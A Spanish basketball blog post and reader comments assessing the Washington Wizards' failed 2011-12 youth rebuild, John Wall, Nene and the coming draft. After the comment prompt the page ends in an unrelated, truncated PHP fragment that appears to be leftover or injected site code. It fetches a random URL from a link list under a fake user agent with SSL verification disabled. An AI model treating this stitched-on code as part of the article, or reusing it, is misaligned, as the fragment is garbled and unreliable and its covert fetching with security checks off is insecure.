Washington Wizards: Muy deficiente

28 de June de 2012 por Esteban

El castillo de naipes de los Wizards se derrumbó ante el primer viento. El equipo de la capital intentó aplicar el modelo Thunder. La receta parecía sencilla: pon a todos tus jóvenes medianamente talentosos juntos en la cancha, y ellos ganarán partidos y se convertirán en la sensación de la NBA. De sencillo no tuvo nada y la ilusión duró sólo 17 partidos en los que apenas consiguieron dos victorias. Adiós Saunders y borrón y cuenta nueva.

Al principio la idea no parecía tan deficiente. Contaban con el rookie del año John Wall, Nick Young venía de su mejor temporada de profesional, Andray Blatche cerraba la temporada anterior con “números casi all star”, Javale McGee tenía  toda la proyección del mundo, Jordan Crawford parecía tener buena pinta como sexto hombre en su año rookie, y disponían de la frutilla del postre en el puesto de alero, Jan Vesely. Nada salió como se esperaba, prácticamente todos los nombrados jugaron a un nivel pésimo.

Durante el verano, su GM solo fichó a dos veteranos como Ronny Turiaf y Roger Mason, que ya se sabía que no iban a ayudar en absoluto, y a Rashard Lewis, quien podría haber servido de guía sino fuera porque él mismo ya se considera un ex-jugador. Estas decisiones fueron premeditadas. Se intentaba que la responsabilidad cayera sobre los jóvenes directamente. La pena fue que estos jóvenes eran unos irresponsables. Los tres veteranos casi ni jugaron, Turiaf rescindió contrato, a Mason ya se le acabó y Lewis ha sido traspasado recientemente. Así terminaron los “gurús” esta travesía por el desierto.

Así estaban las cosas. Con un arranque de 0-7, sin hombres capaces de guiar y un equipo formado de chiquillos con poco talento que dio lugar a ridículos como el de Javale McGee corriendo a defender mientras su equipo atacaba, o declaraciones como las de Deron Williams diciendo “no son los chicos mas inteligentes del mundo”.

Ante tanto papelón se decidieron a cambiar la dirección. Adiós a Young y a McGee y bienvenida para Nene. Menos juventud, potencial, proyección… y más realidad y saber estar.

La temporada terminó con un par de triunfos en partidos donde nadie se jugaba nada de nada y las victorias se celebraban a estadio vacío. Al menos servirá de ejemplo para los otros GM que ahora sabrán que el proyecto Thunder es una utopía y perseguirlo a las apuradas lleva a este desastre.

Lo mejor: Que tienen la 3ª elección del draft. La temporada de Wall, dentro de lo malo, no fue un gran retroceso en su rendimiento yjugó muy buenos partidos. Cuentan con Nene que si tiene ganas puede ser un jugador realmente importante en el Este. Interesante también fue la aparición de jugadores de rol no muy tenidos en cuenta por nadie como Trevor Booker, Kevin Seraphin y Chris Singleton.

Lo peor: Que tienen la 3ª elección del draft y no podrán hacerse con Anthony Davis.La confirmación de que Andray Blatche está muy muy sobrepagado y deberán aplicarle la amnistía ya que es intrasferible. El rookie Jan Vesely que salvo un buen partido, tuvo un año debut para el olvido total La decepción, al menos en Washington, con Javale McGee, llamado a ser el centro del futuro en la capital y que ya terminó su carrera allí a la dulce edad de 23 años.

Jugando a General Manager

Hubiese sido divertido jugar aquí con tanto espacio salarial y jugadores jóvenes, pero el espacio ya se fue. Entre Nene, Okafor y Ariza se comieron los 30 millones con que contaban, así que no queda mucho por hacer. He leído críticas duras al trade que se llevó a Lewis y trajo a Ariza y Okafor. Sin duda podrían haber sacado algo mejor por semejante expiring pero al margen del valor, me parece bien sumar jugadores de nivel medio que darán un respaldo mayor que el que tuvo Wall la temporada pasada.

Nene mantiene un valor bueno a pesar de sus lesiones y quizá alguien lo quiere a cambio de una trade-exception. Con todos los equipos con espacio este año, yo lo haría.

Del draft está clavado que elegirán a Bradley Beal, armando un 5 inicial con Wall, Beal, Ariza, Nene y Okafor, con Crawford de sexto hombre y Vesely como otro recambio. No serán un gran equipo pero creo que han creado un ámbito mas apropiado para que John Wall siga creciendo y se convierta en una super estrella y poder ver el mejor rendimiento de los jóvenes Vasely, Beal y Crawford, más los nombrados Booker, Seraphin y Singleton. Si hubiesen hecho algo así el año pasado, McGee estaría en el equipo y sus errores, con gente de experiencia de respaldo, hubiesen sido menos notables. Casualmente es lo que está ocurriendo en Denver. Creo que hacen bien en apostar en esos trades. Si no es a traves de traspasos, difícilmente consigan que algún jugador de cierto nombre quiera formar parte de ese equipo.

En fin, su capacidad de movimiento ahora es poca, y tienen un plantel bastante armado.

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    Aparentemente todos se estan matando por el puesto 2 de los bobcats, para seleccionar a beal, si es asi, gran decepcion en la capital, y al diablo con mi juego de GM jeje

      Citar

  2. txusma dice:
    #2

    Si pillan a Beal los Bobcats (o el equipo q tenga la elección) que harán los Wizards? Bajar alguna elección y pillar a Waiters? Pillar a MKG o Barnes y ya veremos que hacemos luego? Thomas Robinson?

      Citar

  3. Sancho88 dice:
    #3

    Excelente Esteban. Aunque lógicamente, no estoy de acuerdo en todo, jejeje.

    1º Turiaf no rindió porque se jodió la muñeca nada más empezar.

    2º No creo que lo de los Thunder sea la utopía absoluta, y no veo una comparación real por ningún lado. Thunder han escogido jugadores muy muy especiales, cracks todos, mientras que Wizards no lo eran, salvo Wall (y está por ver si evoluciona como tal). Que fuese un equipo que nos divertía el pasado curso, y en este aparte de sus ridículos, han jugado algunos partidos muy vistosos, de acuerdo. Pero de ahí a compararles con los Thunder… va un mundo, no crees? De hecho, Washington Wizards llevan siendo una verguenza muchos años. Recuerdo un año que vinieron de gira a España y daban auténtica pena, y ya estaban muchos de los jugadores actuales… así que, como diría Risto Mejide, esa comparación no te la compro.

    3º Tampoco es una mala elección crear un equipo joven con jugadores de talento. No digo copiar el modelo de los Thunder, pero sí apostar por contratos rookies para tener buena capacidad salarial e intentar convencer a veteranos por el mínimo y demás. Los mid levels han salido muy perjudicados del nuevo convenio y esta parece ser una buena estrategia dentro de los equipos. Entonces, con tu reflexión sobre que si Wizards se la han pegado, prácticamente cualquier equipo de la NBA que intente hacer lo de los Thunder se la pegarán en las mismas condiciones, que quieres decir? que equipos como los Kings, por ejemplo, deben tirar su proyecto de tres años ya, con jugadores jóvenes y tal, porque a los Wizards no les ha salido el suyo como esperaban?

    Es a lo que te voy, que cada caso es un mundo y hay que ver equipo por equipo. Y ojo, yo veo bien la remodelación que ha emprendido Washington y la aplaudo, era vergonzosa la actitud de Magee, Blatche, etc. Y luego, en el tema friki friki, me gustó mucho Selvin Mack, cuando se fue Young jugó muy bien. Buena temporada aunque con muchos altibajos de Booker, Seraphin, a pesar de su altura SÍ es un jugador muy válido para la NBA… y ojo a la fricada que voy a decir… me encanta Cartier Martin, jejeje. No es coña

      Citar

  4. Esteban dice:
    #4

    Sancho

    Primero, turiaf no rindio por q no puede rendir, mas alla de su lesion, no habria marcado la mas minima diferencia en este equipo, es un jugador de rol como pocos, util en otros equipos, pero no en este

    En cuanto a la comparacion, yo no la haga, justamente marco la diferencia, washigton crei q tenia material para compararse, pero no lo tenia, intentaron y fracasaron, y dije q fue adrede el intento por q los fichajes fueron claramente en direccion de dar responsabilidades a los jovenes, y estos no estaban preparados y terminaron en papelon, ni un hombre con experiencia y ganas para guiarlos

    En cuanto a la utopia, para mi lo es, no imagino q otro equipo pase del peor equipo de la nba, 4 años desp, con todos contratos rookies sea n finalostas de la nna

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>